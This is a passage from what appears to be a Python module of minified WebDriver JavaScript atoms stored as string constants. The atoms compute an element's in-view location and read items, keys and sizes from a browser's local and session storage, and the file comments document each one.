"ment;if(e.defaultView&&e.defaultView.getComputedStyle&&(e=e.defaultView"\
".getComputedStyle(a,null))){d=e[d]||e.getPropertyValue(d)||\"\";break a"\
"}d=\"\"}c=d||W(a,c);if(null===c)c=null;else if(0<=q(ba,b)&&(x.test(\"#"\
"\"==c.charAt(0)?c:\"#\"+c)||z(c).length||u&&u[c.toLowerCase()]||y(c).le"\
"ngth)){d=y(c);if(!d.length){a:if(d=z(c),!d.length){d=(d=u[c.toLowerCase"\
"()])?d:\"#\"==\nc.charAt(0)?c:\"#\"+c;if(x.test(d)&&(d=w(d),d=w(d),d=[p"\
"arseInt(d.substr(1,2),16),parseInt(d.substr(3,2),16),parseInt(d.substr("\
"5,2),16)],d.length))break a;d=[]}3==d.length&&d.push(1)}c=4!=d.length?c"\
":\"rgba(\"+d.join(\", \")+\")\"}return c}var Y=[\"_\"],Z=h;Y[0]in Z||!Z"\
".execScript||Z.execScript(\"var \"+Y[0]);for(var $;Y.length&&($=Y.shift"\
"());)Y.length||void 0===X?Z=Z[$]?Z[$]:Z[$]={}:Z[$]=X;; return this._.ap"\
"ply(null,arguments);}.apply({navigator:typeof window!=undefined?window."\
"navigator:null,document:typeof window!=undefined?window.document:null},"\
" arguments);}"
GET_IN_VIEW_LOCATION = \
"function(){return function(){function g(a){return function(){return a}}"\
"var h=this;function l(a){return\"string\"==typeof a};var m=window;var n"\
"=Array.prototype;function p(a,b){for(var c=a.length,d=l(a)?a.split(\"\""\
"):a,e=0;e<c;e++)e in d&&b.call(void 0,d[e],e,a)}function aa(a,b){if(a.r"\
"educe)return a.reduce(b,\"\");var c=\"\";p(a,function(d,e){c=b.call(voi"\
"d 0,c,d,e,a)});return c}function ba(a,b,c){return 2>=arguments.length?n"\
".slice.call(a,b):n.slice.call(a,b,c)};function q(a,b){this.code=a;this."\
"state=r[a]||s;this.message=b||\"\";var c=this.state.replace(/((?:^|\\s+"\
")[a-z])/g,function(a){return a.toUpperCase().replace(/^[\\s\\xa0]+/g,\""\
"\")}),d=c.length-5;if(0>d||c.indexOf(\"Error\",d)!=d)c+=\"Error\";this."\
"name=c;c=Error(this.message);c.name=this.name;this.stack=c.stack||\"\"}"\
"(function(){var a=Error;function b(){}b.prototype=a.prototype;q.G=a.pro"\
"totype;q.prototype=new b})();\nvar s=\"unknown error\",r={15:\"element "\
"not selectable\",11:\"element not visible\",31:\"ime engine activation "\
"failed\",30:\"ime not available\",24:\"invalid cookie domain\",29:\"inv"\
"alid element coordinates\",12:\"invalid element state\",32:\"invalid se"\
"lector\",51:\"invalid selector\",52:\"invalid selector\",17:\"javascrip"\
"t error\",405:\"unsupported operation\",34:\"move target out of bounds"\
"\",27:\"no such alert\",7:\"no such element\",8:\"no such frame\",23:\""\
"no such window\",28:\"script timeout\",33:\"session not created\",10:\""\
"stale element reference\",\n0:\"success\",21:\"timeout\",25:\"unable to"\
" set cookie\",26:\"unexpected alert open\"};r[13]=s;r[9]=\"unknown comm"\
"and\";q.prototype.toString=function(){return this.name+\": \"+this.mess"\
"age};var t;function u(a,b){this.x=void 0!==a?a:0;this.y=void 0!==b?b:0}"\
"u.prototype.toString=function(){return\"(\"+this.x+\", \"+this.y+\")\"}"\
";u.prototype.ceil=function(){this.x=Math.ceil(this.x);this.y=Math.ceil("\
"this.y);return this};u.prototype.floor=function(){this.x=Math.floor(thi"\
"s.x);this.y=Math.floor(this.y);return this};u.prototype.round=function("\
"){this.x=Math.round(this.x);this.y=Math.round(this.y);return this};func"\
"tion w(a,b){this.width=a;this.height=b}w.prototype.toString=function(){"\
"return\"(\"+this.width+\" x \"+this.height+\")\"};w.prototype.ceil=func"\
"tion(){this.width=Math.ceil(this.width);this.height=Math.ceil(this.heig"\
"ht);return this};w.prototype.floor=function(){this.width=Math.floor(thi"\
"s.width);this.height=Math.floor(this.height);return this};w.prototype.r"\
"ound=function(){this.width=Math.round(this.width);this.height=Math.roun"\
"d(this.height);return this};function x(a){var b=a.body;a=a.parentWindow"\
"||a.defaultView;return new u(a.pageXOffset||b.scrollLeft,a.pageYOffset|"\
"|b.scrollTop)}function y(a,b){if(a.contains&&1==b.nodeType)return a==b|"\
"|a.contains(b);if(\"undefined\"!=typeof a.compareDocumentPosition)retur"\
"n a==b||Boolean(a.compareDocumentPosition(b)&16);for(;b&&a!=b;)b=b.pare"\
"ntNode;return b==a}\nfunction ca(a,b){if(a==b)return 0;if(a.compareDocu"\
"mentPosition)return a.compareDocumentPosition(b)&2?1:-1;if(\"sourceInde"\
"x\"in a||a.parentNode&&\"sourceIndex\"in a.parentNode){var c=1==a.nodeT"\
"ype,d=1==b.nodeType;if(c&&d)return a.sourceIndex-b.sourceIndex;var e=a."\
"parentNode,f=b.parentNode;return e==f?A(a,b):!c&&y(e,b)?-1*B(a,b):!d&&y"\
"(f,a)?B(b,a):(c?a.sourceIndex:e.sourceIndex)-(d?b.sourceIndex:f.sourceI"\
"ndex)}d=C(a);c=d.createRange();c.selectNode(a);c.collapse(!0);d=d.creat"\
"eRange();d.selectNode(b);d.collapse(!0);\nreturn c.compareBoundaryPoint"\
"s(h.Range.START_TO_END,d)}function B(a,b){var c=a.parentNode;if(c==b)re"\
"turn-1;for(var d=b;d.parentNode!=c;)d=d.parentNode;return A(d,a)}functi"\
"on A(a,b){for(var c=b;c=c.previousSibling;)if(c==a)return-1;return 1}fu"\
"nction C(a){return 9==a.nodeType?a:a.ownerDocument||a.document}function"\
" D(a){this.k=a||h.document||document}D.prototype.contains=y;function E("\
"a){var b=null,c=a.nodeType;1==c&&(b=a.textContent,b=void 0==b||null==b?"\
"a.innerText:b,b=void 0==b||null==b?\"\":b);if(\"string\"!=typeof b)if(9"\
"==c||1==c){a=9==c?a.documentElement:a.firstChild;for(var c=0,d=[],b=\""\
"\";a;){do 1!=a.nodeType&&(b+=a.nodeValue),d[c++]=a;while(a=a.firstChild"\
");for(;c&&!(a=d[--c].nextSibling););}}else b=a.nodeValue;return\"\"+b}"\
"\nfunction F(a,b,c){if(null===b)return!0;try{if(!a.getAttribute)return!"\
"1}catch(d){return!1}return null==c?!!a.getAttribute(b):a.getAttribute(b"\
",2)==c}function G(a,b,c,d,e){return da.call(null,a,b,l(c)?c:null,l(d)?d"\
":null,e||new H)}\nfunction da(a,b,c,d,e){b.getElementsByName&&d&&\"name"\
"\"==c?(b=b.getElementsByName(d),p(b,function(b){a.matches(b)&&e.add(b)}"\
")):b.getElementsByClassName&&d&&\"class\"==c?(b=b.getElementsByClassNam"\
"e(d),p(b,function(b){b.className==d&&a.matches(b)&&e.add(b)})):b.getEle"\
"mentsByTagName&&(b=b.getElementsByTagName(a.getName()),p(b,function(a){"\
"F(a,c,d)&&e.add(a)}));return e}function ea(a,b,c,d,e){for(b=b.firstChil"\
"d;b;b=b.nextSibling)F(b,c,d)&&a.matches(b)&&e.add(b);return e};function"\
" H(){this.d=this.c=null;this.g=0}function I(a){this.l=a;this.next=this."\
"i=null}H.prototype.unshift=function(a){a=new I(a);a.next=this.c;this.d?"\
"this.c.i=a:this.c=this.d=a;this.c=a;this.g++};H.prototype.add=function("\
"a){a=new I(a);a.i=this.d;this.c?this.d.next=a:this.c=this.d=a;this.d=a;"\
"this.g++};function J(a){return(a=a.c)?a.l:null}function L(a){return new"\
" M(a,!1)}function M(a,b){this.C=a;this.j=(this.m=b)?a.d:a.c;this.p=null"\
"}\nM.prototype.next=function(){var a=this.j;if(null==a)return null;var "\
"b=this.p=a;this.j=this.m?a.i:a.next;return b.l};function N(a,b,c,d,e){b"\
"=b.evaluate(d);c=c.evaluate(d);var f;if(b instanceof H&&c instanceof H)"\
"{e=L(b);for(d=e.next();d;d=e.next())for(b=L(c),f=b.next();f;f=b.next())"\
"if(a(E(d),E(f)))return!0;return!1}if(b instanceof H||c instanceof H){b "\
"instanceof H?e=b:(e=c,c=b);e=L(e);b=typeof c;for(d=e.next();d;d=e.next("\
")){switch(b){case \"number\":d=+E(d);break;case \"boolean\":d=!!E(d);br"\
"eak;case \"string\":d=E(d);break;default:throw Error(\"Illegal primitiv"\
"e type for comparison.\");}if(a(d,c))return!0}return!1}return e?\n\"boo"\
"lean\"==typeof b||\"boolean\"==typeof c?a(!!b,!!c):\"number\"==typeof b"\
"||\"number\"==typeof c?a(+b,+c):a(b,c):a(+b,+c)}function O(a,b,c,d){thi"\
"s.q=a;this.F=b;this.n=c;this.o=d}O.prototype.toString=function(){return"\
" this.q};var P={};function Q(a,b,c,d){if(a in P)throw Error(\"Binary op"\
"erator already created: \"+a);a=new O(a,b,c,d);P[a.toString()]=a}Q(\"di"\
"v\",6,1,function(a,b,c){return a.b(c)/b.b(c)});Q(\"mod\",6,1,function(a"\
",b,c){return a.b(c)%b.b(c)});Q(\"*\",6,1,function(a,b,c){return a.b(c)*"\
"b.b(c)});\nQ(\"+\",5,1,function(a,b,c){return a.b(c)+b.b(c)});Q(\"-\",5"\
",1,function(a,b,c){return a.b(c)-b.b(c)});Q(\"<\",4,2,function(a,b,c){r"\
"eturn N(function(a,b){return a<b},a,b,c)});Q(\">\",4,2,function(a,b,c){"\
"return N(function(a,b){return a>b},a,b,c)});Q(\"<=\",4,2,function(a,b,c"\
"){return N(function(a,b){return a<=b},a,b,c)});Q(\">=\",4,2,function(a,"\
"b,c){return N(function(a,b){return a>=b},a,b,c)});Q(\"=\",3,2,function("\
"a,b,c){return N(function(a,b){return a==b},a,b,c,!0)});\nQ(\"!=\",3,2,f"\
"unction(a,b,c){return N(function(a,b){return a!=b},a,b,c,!0)});Q(\"and"\
"\",2,2,function(a,b,c){return a.f(c)&&b.f(c)});Q(\"or\",1,2,function(a,"\
"b,c){return a.f(c)||b.f(c)});function R(a,b,c,d,e,f,k,v,z){this.h=a;thi"\
"s.n=b;this.B=c;this.A=d;this.w=e;this.o=f;this.v=k;this.u=void 0!==v?v:"\
"k;this.D=!!z}R.prototype.toString=function(){return this.h};var S={};fu"\
"nction T(a,b,c,d,e,f,k,v){if(a in S)throw Error(\"Function already crea"\
"ted: \"+a+\".\");S[a]=new R(a,b,c,d,!1,e,f,k,v)}T(\"boolean\",2,!1,!1,f"\
"unction(a,b){return b.f(a)},1);T(\"ceiling\",1,!1,!1,function(a,b){retu"\
"rn Math.ceil(b.b(a))},1);\nT(\"concat\",3,!1,!1,function(a,b){var c=ba("\
"arguments,1);return aa(c,function(b,c){return b+c.a(a)})},2,null);T(\"c"\
"ontains\",2,!1,!1,function(a,b,c){b=b.a(a);a=c.a(a);return-1!=b.indexOf"\
"(a)},2);T(\"count\",1,!1,!1,function(a,b){return b.evaluate(a).g},1,1,!"\
"0);T(\"false\",2,!1,!1,g(!1),0);T(\"floor\",1,!1,!1,function(a,b){retur"\
"n Math.floor(b.b(a))},1);\nT(\"id\",4,!1,!1,function(a,b){var c=a.e(),d"\
"=9==c.nodeType?c:c.ownerDocument,c=b.a(a).split(/\\s+/),e=[];p(c,functi"\
"on(a){a=d.getElementById(a);var b;if(!(b=!a)){a:if(l(e))b=l(a)&&1==a.le"\
"ngth?e.indexOf(a,0):-1;else{for(b=0;b<e.length;b++)if(b in e&&e[b]===a)"\
"break a;b=-1}b=0<=b}b||e.push(a)});e.sort(ca);var f=new H;p(e,function("\
"a){f.add(a)});return f},1);T(\"lang\",2,!1,!1,g(!1),1);T(\"last\",1,!0,"\
"!1,function(a){if(1!=arguments.length)throw Error(\"Function last expec"\
"ts ()\");return a.s()},0);\nT(\"local-name\",3,!1,!0,function(a,b){var "\
"c=b?J(b.evaluate(a)):a.e();return c?c.nodeName.toLowerCase():\"\"},0,1,"\
"!0);T(\"name\",3,!1,!0,function(a,b){var c=b?J(b.evaluate(a)):a.e();ret"\
"urn c?c.nodeName.toLowerCase():\"\"},0,1,!0);T(\"namespace-uri\",3,!0,!"\
"1,g(\"\"),0,1,!0);T(\"normalize-space\",3,!1,!0,function(a,b){return(b?"\
"b.a(a):E(a.e())).replace(/[\\s\\xa0]+/g,\" \").replace(/^\\s+|\\s+$/g,"\
"\"\")},0,1);T(\"not\",2,!1,!1,function(a,b){return!b.f(a)},1);T(\"numbe"\
"r\",1,!1,!0,function(a,b){return b?b.b(a):+E(a.e())},0,1);\nT(\"positio"\
"n\",1,!0,!1,function(a){return a.t()},0);T(\"round\",1,!1,!1,function(a"\
",b){return Math.round(b.b(a))},1);T(\"starts-with\",2,!1,!1,function(a,"\
"b,c){b=b.a(a);a=c.a(a);return 0==b.lastIndexOf(a,0)},2);T(\"string\",3,"\
"!1,!0,function(a,b){return b?b.a(a):E(a.e())},0,1);T(\"string-length\","\
"1,!1,!0,function(a,b){return(b?b.a(a):E(a.e())).length},0,1);\nT(\"subs"\
"tring\",3,!1,!1,function(a,b,c,d){c=c.b(a);if(isNaN(c)||Infinity==c||-I"\
"nfinity==c)return\"\";d=d?d.b(a):Infinity;if(isNaN(d)||-Infinity===d)re"\
"turn\"\";c=Math.round(c)-1;var e=Math.max(c,0);a=b.a(a);if(Infinity==d)"\
"return a.substring(e);b=Math.round(d);return a.substring(e,c+b)},2,3);T"\
"(\"substring-after\",3,!1,!1,function(a,b,c){b=b.a(a);a=c.a(a);c=b.inde"\
"xOf(a);return-1==c?\"\":b.substring(c+a.length)},2);\nT(\"substring-bef"\
"ore\",3,!1,!1,function(a,b,c){b=b.a(a);a=c.a(a);a=b.indexOf(a);return-1"\
"==a?\"\":b.substring(0,a)},2);T(\"sum\",1,!1,!1,function(a,b){for(var c"\
"=L(b.evaluate(a)),d=0,e=c.next();e;e=c.next())d+=+E(e);return d},1,1,!0"\
");T(\"translate\",3,!1,!1,function(a,b,c,d){b=b.a(a);c=c.a(a);var e=d.a"\
"(a);a=[];for(d=0;d<c.length;d++){var f=c.charAt(d);f in a||(a[f]=e.char"\
"At(d))}c=\"\";for(d=0;d<b.length;d++)f=b.charAt(d),c+=f in a?a[f]:f;ret"\
"urn c},3);T(\"true\",2,!1,!1,g(!0),0);function U(a,b,c,d){this.h=a;this"\
".r=b;this.m=c;this.H=d}U.prototype.toString=function(){return this.h};v"\
"ar V={};function W(a,b,c,d){if(a in V)throw Error(\"Axis already create"\
"d: \"+a);V[a]=new U(a,b,c,!!d)}W(\"ancestor\",function(a,b){for(var c=n"\
"ew H,d=b;d=d.parentNode;)a.matches(d)&&c.unshift(d);return c},!0);W(\"a"\
"ncestor-or-self\",function(a,b){var c=new H,d=b;do a.matches(d)&&c.unsh"\
"ift(d);while(d=d.parentNode);return c},!0);\nW(\"attribute\",function(a"\
",b){var c=new H,d=a.getName(),e=b.attributes;if(e)if(\"*\"==d)for(var d"\
"=0,f;f=e[d];d++)c.add(f);else(f=e.getNamedItem(d))&&c.add(f);return c},"\
"!1);W(\"child\",function(a,b,c,d,e){return ea.call(null,a,b,l(c)?c:null"\
",l(d)?d:null,e||new H)},!1,!0);W(\"descendant\",G,!1,!0);W(\"descendant"\
"-or-self\",function(a,b,c,d){var e=new H;F(b,c,d)&&a.matches(b)&&e.add("\
"b);return G(a,b,c,d,e)},!1,!0);\nW(\"following\",function(a,b,c,d){var "\
"e=new H;do for(var f=b;f=f.nextSibling;)F(f,c,d)&&a.matches(f)&&e.add(f"\
"),e=G(a,f,c,d,e);while(b=b.parentNode);return e},!1,!0);W(\"following-s"\
"ibling\",function(a,b){for(var c=new H,d=b;d=d.nextSibling;)a.matches(d"\
")&&c.add(d);return c},!1);W(\"namespace\",function(){return new H},!1);"\
"W(\"parent\",function(a,b){var c=new H;if(9==b.nodeType)return c;if(2=="\
"b.nodeType)return c.add(b.ownerElement),c;var d=b.parentNode;a.matches("\
"d)&&c.add(d);return c},!1);\nW(\"preceding\",function(a,b,c,d){var e=ne"\
"w H,f=[];do f.unshift(b);while(b=b.parentNode);for(var k=1,v=f.length;k"\
"<v;k++){var z=[];for(b=f[k];b=b.previousSibling;)z.unshift(b);for(var K"\
"=0,fa=z.length;K<fa;K++)b=z[K],F(b,c,d)&&a.matches(b)&&e.add(b),e=G(a,b"\
",c,d,e)}return e},!0,!0);W(\"preceding-sibling\",function(a,b){for(var "\
"c=new H,d=b;d=d.previousSibling;)a.matches(d)&&c.unshift(d);return c},!"\
"0);W(\"self\",function(a,b){var c=new H;a.matches(b)&&c.add(b);return c"\
"},!1);function X(a,b){var c=b||m,d;d=(c||window).document;d=\"CSS1Compa"\
"t\"==d.compatMode?d.documentElement:d.body;d=new w(d.clientWidth,d.clie"\
"ntHeight);var e=a.x>=d.width?a.x-(d.width-1):0>a.x?a.x:0,f=a.y>=d.heigh"\
"t?a.y-(d.height-1):0>a.y?a.y:0,k;k=c.document?new D(C(c.document)):t||("\
"t=new D);k=x(k.k);0==e&&0==f||c.scrollBy(e,f);c=c.document?new D(C(c.do"\
"cument)):t||(t=new D);c=x(c.k);if(k.x+e!=c.x||k.y+f!=c.y)throw new q(34"\
",\"The target location (\"+(a.x+k.x)+\", \"+(a.y+k.y)+\") is not on the"\
" webpage.\");c=new u(a.x-\ne,a.y-f);if(0>c.x||c.x>=d.width)throw new q("\
"34,\"The target location (\"+c.x+\", \"+c.y+\") should be within the vi"\
"ewport (\"+d.width+\":\"+d.height+\") after scrolling.\");if(0>c.y||c.y"\
">=d.height)throw new q(34,\"The target location (\"+c.x+\", \"+c.y+\") "\
"should be within the viewport (\"+d.width+\":\"+d.height+\") after scro"\
"lling.\");return c}var Y=[\"_\"],Z=h;Y[0]in Z||!Z.execScript||Z.execScr"\
"ipt(\"var \"+Y[0]);for(var $;Y.length&&($=Y.shift());)Y.length||void 0="\
"==X?Z=Z[$]?Z[$]:Z[$]={}:Z[$]=X;; return this._.apply(null,arguments);}."\
"apply({navigator:typeof window!=undefined?window.navigator:null,documen"\
"t:typeof window!=undefined?window.document:null}, arguments);}"
# Minified, machine-generated JavaScript atom (do not hand-edit the payload).
# When executed in the browser it returns window.localStorage.getItem(key)
# for the single key passed as argument; if local storage is unavailable it
# throws a WebDriver error with code 13 ("Local storage undefined").
GET_LOCAL_STORAGE_ITEM = \
"function(){return function(){var c=window;function d(a,g){this.code=a;t"\
"his.state=e[a]||f;this.message=g||\"\";var b=this.state.replace(/((?:^|"\
"\\s+)[a-z])/g,function(a){return a.toUpperCase().replace(/^[\\s\\xa0]+/"\
"g,\"\")}),l=b.length-5;if(0>l||b.indexOf(\"Error\",l)!=l)b+=\"Error\";t"\
"his.name=b;b=Error(this.message);b.name=this.name;this.stack=b.stack||"\
"\"\"}(function(){var a=Error;function g(){}g.prototype=a.prototype;d.b="\
"a.prototype;d.prototype=new g})();\nvar f=\"unknown error\",e={15:\"ele"\
"ment not selectable\",11:\"element not visible\",31:\"ime engine activa"\
"tion failed\",30:\"ime not available\",24:\"invalid cookie domain\",29:"\
"\"invalid element coordinates\",12:\"invalid element state\",32:\"inval"\
"id selector\",51:\"invalid selector\",52:\"invalid selector\",17:\"java"\
"script error\",405:\"unsupported operation\",34:\"move target out of bo"\
"unds\",27:\"no such alert\",7:\"no such element\",8:\"no such frame\",2"\
"3:\"no such window\",28:\"script timeout\",33:\"session not created\",1"\
"0:\"stale element reference\",\n0:\"success\",21:\"timeout\",25:\"unabl"\
"e to set cookie\",26:\"unexpected alert open\"};e[13]=f;e[9]=\"unknown "\
"command\";d.prototype.toString=function(){return this.name+\": \"+this."\
"message};var h=this.navigator;var k=-1!=(h&&h.platform||\"\").indexOf("\
"\"Win\")&&!1;\nfunction m(){var a=c||c;switch(\"local_storage\"){case "\
"\"appcache\":return null!=a.applicationCache;case \"browser_connection"\
"\":return null!=a.navigator&&null!=a.navigator.onLine;case \"database\""\
":return null!=a.openDatabase;case \"location\":return k?!1:null!=a.navi"\
"gator&&null!=a.navigator.geolocation;case \"local_storage\":return null"\
"!=a.localStorage;case \"session_storage\":return null!=a.sessionStorage"\
"&&null!=a.sessionStorage.clear;default:throw new d(13,\"Unsupported API"\
" identifier provided as parameter\");}}\n;function n(a){this.a=a}n.prot"\
"otype.getItem=function(a){return this.a.getItem(a)};n.prototype.clear=f"\
"unction(){this.a.clear()};function p(a){if(!m())throw new d(13,\"Local "\
"storage undefined\");return(new n(c.localStorage)).getItem(a)}var q=[\""\
"_\"],r=this;q[0]in r||!r.execScript||r.execScript(\"var \"+q[0]);for(va"\
"r s;q.length&&(s=q.shift());)q.length||void 0===p?r=r[s]?r[s]:r[s]={}:r"\
"[s]=p;; return this._.apply(null,arguments);}.apply({navigator:typeof w"\
"indow!=undefined?window.navigator:null,document:typeof window!=undefine"\
"d?window.document:null}, arguments);}"
# Minified, machine-generated JavaScript atom (do not hand-edit the payload).
# Returns window.localStorage.key(index) — the key name at the given numeric
# index; throws a WebDriver error with code 13 ("Local storage undefined")
# when local storage is not available in the target window.
GET_LOCAL_STORAGE_KEY = \
"function(){return function(){var c=window;function d(a,g){this.code=a;t"\
"his.state=e[a]||f;this.message=g||\"\";var b=this.state.replace(/((?:^|"\
"\\s+)[a-z])/g,function(a){return a.toUpperCase().replace(/^[\\s\\xa0]+/"\
"g,\"\")}),l=b.length-5;if(0>l||b.indexOf(\"Error\",l)!=l)b+=\"Error\";t"\
"his.name=b;b=Error(this.message);b.name=this.name;this.stack=b.stack||"\
"\"\"}(function(){var a=Error;function g(){}g.prototype=a.prototype;d.b="\
"a.prototype;d.prototype=new g})();\nvar f=\"unknown error\",e={15:\"ele"\
"ment not selectable\",11:\"element not visible\",31:\"ime engine activa"\
"tion failed\",30:\"ime not available\",24:\"invalid cookie domain\",29:"\
"\"invalid element coordinates\",12:\"invalid element state\",32:\"inval"\
"id selector\",51:\"invalid selector\",52:\"invalid selector\",17:\"java"\
"script error\",405:\"unsupported operation\",34:\"move target out of bo"\
"unds\",27:\"no such alert\",7:\"no such element\",8:\"no such frame\",2"\
"3:\"no such window\",28:\"script timeout\",33:\"session not created\",1"\
"0:\"stale element reference\",\n0:\"success\",21:\"timeout\",25:\"unabl"\
"e to set cookie\",26:\"unexpected alert open\"};e[13]=f;e[9]=\"unknown "\
"command\";d.prototype.toString=function(){return this.name+\": \"+this."\
"message};var h=this.navigator;var k=-1!=(h&&h.platform||\"\").indexOf("\
"\"Win\")&&!1;\nfunction m(){var a=c||c;switch(\"local_storage\"){case "\
"\"appcache\":return null!=a.applicationCache;case \"browser_connection"\
"\":return null!=a.navigator&&null!=a.navigator.onLine;case \"database\""\
":return null!=a.openDatabase;case \"location\":return k?!1:null!=a.navi"\
"gator&&null!=a.navigator.geolocation;case \"local_storage\":return null"\
"!=a.localStorage;case \"session_storage\":return null!=a.sessionStorage"\
"&&null!=a.sessionStorage.clear;default:throw new d(13,\"Unsupported API"\
" identifier provided as parameter\");}}\n;function n(a){this.a=a}n.prot"\
"otype.clear=function(){this.a.clear()};n.prototype.key=function(a){retu"\
"rn this.a.key(a)};function p(a){if(!m())throw new d(13,\"Local storage "\
"undefined\");return(new n(c.localStorage)).key(a)}var q=[\"_\"],r=this;"\
"q[0]in r||!r.execScript||r.execScript(\"var \"+q[0]);for(var s;q.length"\
"&&(s=q.shift());)q.length||void 0===p?r=r[s]?r[s]:r[s]={}:r[s]=p;; retu"\
"rn this._.apply(null,arguments);}.apply({navigator:typeof window!=undef"\
"ined?window.navigator:null,document:typeof window!=undefined?window.doc"\
"ument:null}, arguments);}"
# Minified, machine-generated JavaScript atom (do not hand-edit the payload).
# Returns an array of every key currently in window.localStorage (iterates
# index 0 .. localStorage.length-1 calling key(i)); throws a WebDriver error
# with code 13 ("Local storage undefined") if local storage is unavailable.
GET_LOCAL_STORAGE_KEYS = \
"function(){return function(){var d=window;function f(a,e){this.code=a;t"\
"his.state=g[a]||h;this.message=e||\"\";var b=this.state.replace(/((?:^|"\
"\\s+)[a-z])/g,function(a){return a.toUpperCase().replace(/^[\\s\\xa0]+/"\
"g,\"\")}),c=b.length-5;if(0>c||b.indexOf(\"Error\",c)!=c)b+=\"Error\";t"\
"his.name=b;b=Error(this.message);b.name=this.name;this.stack=b.stack||"\
"\"\"}(function(){var a=Error;function e(){}e.prototype=a.prototype;f.b="\
"a.prototype;f.prototype=new e})();\nvar h=\"unknown error\",g={15:\"ele"\
"ment not selectable\",11:\"element not visible\",31:\"ime engine activa"\
"tion failed\",30:\"ime not available\",24:\"invalid cookie domain\",29:"\
"\"invalid element coordinates\",12:\"invalid element state\",32:\"inval"\
"id selector\",51:\"invalid selector\",52:\"invalid selector\",17:\"java"\
"script error\",405:\"unsupported operation\",34:\"move target out of bo"\
"unds\",27:\"no such alert\",7:\"no such element\",8:\"no such frame\",2"\
"3:\"no such window\",28:\"script timeout\",33:\"session not created\",1"\
"0:\"stale element reference\",\n0:\"success\",21:\"timeout\",25:\"unabl"\
"e to set cookie\",26:\"unexpected alert open\"};g[13]=h;g[9]=\"unknown "\
"command\";f.prototype.toString=function(){return this.name+\": \"+this."\
"message};var k=this.navigator;var l=-1!=(k&&k.platform||\"\").indexOf("\
"\"Win\")&&!1;\nfunction m(){var a=d||d;switch(\"local_storage\"){case "\
"\"appcache\":return null!=a.applicationCache;case \"browser_connection"\
"\":return null!=a.navigator&&null!=a.navigator.onLine;case \"database\""\
":return null!=a.openDatabase;case \"location\":return l?!1:null!=a.navi"\
"gator&&null!=a.navigator.geolocation;case \"local_storage\":return null"\
"!=a.localStorage;case \"session_storage\":return null!=a.sessionStorage"\
"&&null!=a.sessionStorage.clear;default:throw new f(13,\"Unsupported API"\
" identifier provided as parameter\");}}\n;function n(a){this.a=a}n.prot"\
"otype.clear=function(){this.a.clear()};n.prototype.size=function(){retu"\
"rn this.a.length};n.prototype.key=function(a){return this.a.key(a)};fun"\
"ction p(){var a;if(!m())throw new f(13,\"Local storage undefined\");a=n"\
"ew n(d.localStorage);for(var e=[],b=a.size(),c=0;c<b;c++)e[c]=a.a.key(c"\
");return e}var q=[\"_\"],r=this;q[0]in r||!r.execScript||r.execScript("\
"\"var \"+q[0]);for(var s;q.length&&(s=q.shift());)q.length||void 0===p?"\
"r=r[s]?r[s]:r[s]={}:r[s]=p;; return this._.apply(null,arguments);}.appl"\
"y({navigator:typeof window!=undefined?window.navigator:null,document:ty"\
"peof window!=undefined?window.document:null}, arguments);}"
# Minified, machine-generated JavaScript atom (do not hand-edit the payload).
# Returns window.localStorage.length (the number of stored key/value pairs);
# throws a WebDriver error with code 13 ("Local storage undefined") if local
# storage is not available.
GET_LOCAL_STORAGE_SIZE = \
"function(){return function(){var c=window;function d(a,g){this.code=a;t"\
"his.state=e[a]||f;this.message=g||\"\";var b=this.state.replace(/((?:^|"\
"\\s+)[a-z])/g,function(a){return a.toUpperCase().replace(/^[\\s\\xa0]+/"\
"g,\"\")}),l=b.length-5;if(0>l||b.indexOf(\"Error\",l)!=l)b+=\"Error\";t"\
"his.name=b;b=Error(this.message);b.name=this.name;this.stack=b.stack||"\
"\"\"}(function(){var a=Error;function g(){}g.prototype=a.prototype;d.b="\
"a.prototype;d.prototype=new g})();\nvar f=\"unknown error\",e={15:\"ele"\
"ment not selectable\",11:\"element not visible\",31:\"ime engine activa"\
"tion failed\",30:\"ime not available\",24:\"invalid cookie domain\",29:"\
"\"invalid element coordinates\",12:\"invalid element state\",32:\"inval"\
"id selector\",51:\"invalid selector\",52:\"invalid selector\",17:\"java"\
"script error\",405:\"unsupported operation\",34:\"move target out of bo"\
"unds\",27:\"no such alert\",7:\"no such element\",8:\"no such frame\",2"\
"3:\"no such window\",28:\"script timeout\",33:\"session not created\",1"\
"0:\"stale element reference\",\n0:\"success\",21:\"timeout\",25:\"unabl"\
"e to set cookie\",26:\"unexpected alert open\"};e[13]=f;e[9]=\"unknown "\
"command\";d.prototype.toString=function(){return this.name+\": \"+this."\
"message};var h=this.navigator;var k=-1!=(h&&h.platform||\"\").indexOf("\
"\"Win\")&&!1;\nfunction m(){var a=c||c;switch(\"local_storage\"){case "\
"\"appcache\":return null!=a.applicationCache;case \"browser_connection"\
"\":return null!=a.navigator&&null!=a.navigator.onLine;case \"database\""\
":return null!=a.openDatabase;case \"location\":return k?!1:null!=a.navi"\
"gator&&null!=a.navigator.geolocation;case \"local_storage\":return null"\
"!=a.localStorage;case \"session_storage\":return null!=a.sessionStorage"\
"&&null!=a.sessionStorage.clear;default:throw new d(13,\"Unsupported API"\
" identifier provided as parameter\");}}\n;function n(a){this.a=a}n.prot"\
"otype.clear=function(){this.a.clear()};n.prototype.size=function(){retu"\
"rn this.a.length};function p(){if(!m())throw new d(13,\"Local storage u"\
"ndefined\");return(new n(c.localStorage)).size()}var q=[\"_\"],r=this;q"\
"[0]in r||!r.execScript||r.execScript(\"var \"+q[0]);for(var s;q.length&"\
"&(s=q.shift());)q.length||void 0===p?r=r[s]?r[s]:r[s]={}:r[s]=p;; retur"\
"n this._.apply(null,arguments);}.apply({navigator:typeof window!=undefi"\
"ned?window.navigator:null,document:typeof window!=undefined?window.docu"\
"ment:null}, arguments);}"
# Minified, machine-generated JavaScript atom (do not hand-edit the payload).
# Returns window.sessionStorage.getItem(key) for the key passed as argument;
# throws a WebDriver error with code 13 ("Session storage undefined") if
# session storage is not available in the target window.
GET_SESSION_STORAGE_ITEM = \
"function(){return function(){var c=window;function e(a,d){this.code=a;t"\
"his.state=f[a]||g;this.message=d||\"\";var b=this.state.replace(/((?:^|"\
"\\s+)[a-z])/g,function(a){return a.toUpperCase().replace(/^[\\s\\xa0]+/"\
"g,\"\")}),l=b.length-5;if(0>l||b.indexOf(\"Error\",l)!=l)b+=\"Error\";t"\
"his.name=b;b=Error(this.message);b.name=this.name;this.stack=b.stack||"\
"\"\"}(function(){var a=Error;function d(){}d.prototype=a.prototype;e.b="\
"a.prototype;e.prototype=new d})();\nvar g=\"unknown error\",f={15:\"ele"\
"ment not selectable\",11:\"element not visible\",31:\"ime engine activa"\
"tion failed\",30:\"ime not available\",24:\"invalid cookie domain\",29:"\
